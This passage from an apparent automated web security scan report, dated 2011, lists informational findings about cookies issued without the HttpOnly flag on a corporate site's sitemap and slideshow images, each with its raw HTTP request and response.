Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:20 GMT;path=/
Content-Length: 39463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.90. http://www2.starcite.com/starcite/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/sitemap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/sitemap HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:17 GMT;path=/
Content-Length: 16966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.91. http://www2.starcite.com/starcite/slideshow/images/bgsmall.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bgsmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bgsmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:48:43 GMT
ETag: "100000000317c-d6bc-47e2ab0931cc0"
Accept-Ranges: bytes
Content-Length: 54972
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

.PNG
.
...IHDR...<...<.....:..r....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.1/27/10A.sf....prVWx..Z{p...?.!.........>k..RJFDS..(.4......."    >?.C.
...[SNIP]...

2.92. http://www2.starcite.com/starcite/slideshow/images/big-picture_r1_c1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r1_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r1_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317d-5fe1-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 24545
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

GIF89a..7..........HJOwvv...%%$11:..._^^.........EFEkkk......,-+...>;;TUV...npo......&#$.............'$&......]_]-++-/.ot}...PNO...?>?.........GGF...WVW!!!:11...=><.....TVT.........qpo......GEE...
...[SNIP]...

2.93. http://www2.starcite.com/starcite/slideshow/images/big-picture_r2_c1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r2_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r2_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317e-8f13-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 36627
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

GIF89a..........vwvEFD....,,LNM...eSBlR9.f.....y$...mmo....[....<>=...$#%....{B^_^.
.........U...q_L..1:1.......m...........t..1...NMM.s/.S#
..."......%""pop.TVT.q3%&&...kkk0./.d.PONGGF..}WVWONO.
...[SNIP]...

2.94. http://www2.starcite.com/starcite/slideshow/images/big-picture_r3_c1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r3_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r3_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317f-4ad0-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 19152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

GIF89a..7.......uuw,,-......NMM......kkk<>=......$&$

.......^^`...DEF11:.......WVV.........npo
.............%&&...xwxJJJ......??>...1:1+-+%$#......MON.........:1:UVTppo...........././.......~....
...[SNIP]...

2.95. http://www2.starcite.com/starcite/slideshow/images/bpsmall.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bpsmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bpsmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:38:01 GMT
ETag: "1000000003185-e43e-47e2a8a4ef840"
Accept-Ranges: bytes
Content-Length: 58430
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

.PNG
.
...IHDR...:...5.............sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.1/27/10A.sf....prVWx....#.....q.....\V.].!    ...    %...H..7z._..g.C...B
...[SNIP]...

2.96. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_1.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:03 GMT
ETag: "100000000318c-c8e-47f589192a8c0"
Accept-Ranges: bytes
Content-Length: 3214
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......7...................................
...[SNIP]...

2.97. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_2.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:17 GMT
ETag: "100000000318e-43a8-47f5892684840"
Accept-Ranges: bytes
Content-Length: 17320
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

2.98. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_3.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:28 GMT
ETag: "1000000003190-872-47f5893102100"
Accept-Ranges: bytes
Content-Length: 2162
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......5...................................
...[SNIP]...

2.99. http://www2.starcite.com/starcite/slideshow/images/buysol.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/buysol.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/buysol.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2010 18:59:09 GMT
ETag: "1000000003191-19df-47e523afe3940"
Accept-Ranges: bytes
Content-Length: 6623
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

.PNG
.
...IHDR.............Nm.<...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

2.100. http://www2.starcite.com/starcite/slideshow/images/corpsol.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/corpsol.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/corpsol.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2010 18:58:23 GMT
ETag: "1000000003192-1bc8-47e52384051c0"
Accept-Ranges: bytes
Content-Length: 7112
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

.PNG
.
...IHDR.............G.IF...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

2.101. http://www2.starcite.com/starcite/slideshow/images/meetings1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings1.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:08 GMT
ETag: "20000000023dd-33d0-4854d00214900"
Accept-Ranges: bytes
Content-Length: 13264
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................7....
...[SNIP]...

2.102. http://www2.starcite.com/starcite/slideshow/images/meetings2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings2.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023de-8a5d-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 35421
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

2.103. http://www2.starcite.com/starcite/slideshow/images/meetings3a.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3a.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3a.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023df-772-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 1906
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................5....
...[SNIP]...

2.104. http://www2.starcite.com/starcite/slideshow/images/meetings3b.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3b.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023e0-759-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 1881
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................5....
...[SNIP]...

2.105. http://www2.starcite.com/starcite/slideshow/images/meetings3c.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3c.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3c.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023e1-1b3a-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 6970
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................5.e..
...[SNIP]...

2.106. http://www2.starcite.com/starcite/slideshow/images/rock-star_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003193-36ed-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 14061
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

GIF89a..7....
....FJ.aC?..I. ....X).!....#...W~Zh.......).    .J*1<."....1...{...A)_...6..._...N.[p:").......H^0.0+....._.2...cr..BzC"7J.2Z)...!..=.FN.MS.2.<Bs...~I>...!.)TM..,%.)k.R&........Cj(/.
...[SNIP]...

2.107. http://www2.starcite.com/starcite/slideshow/images/rock-star_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_2.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
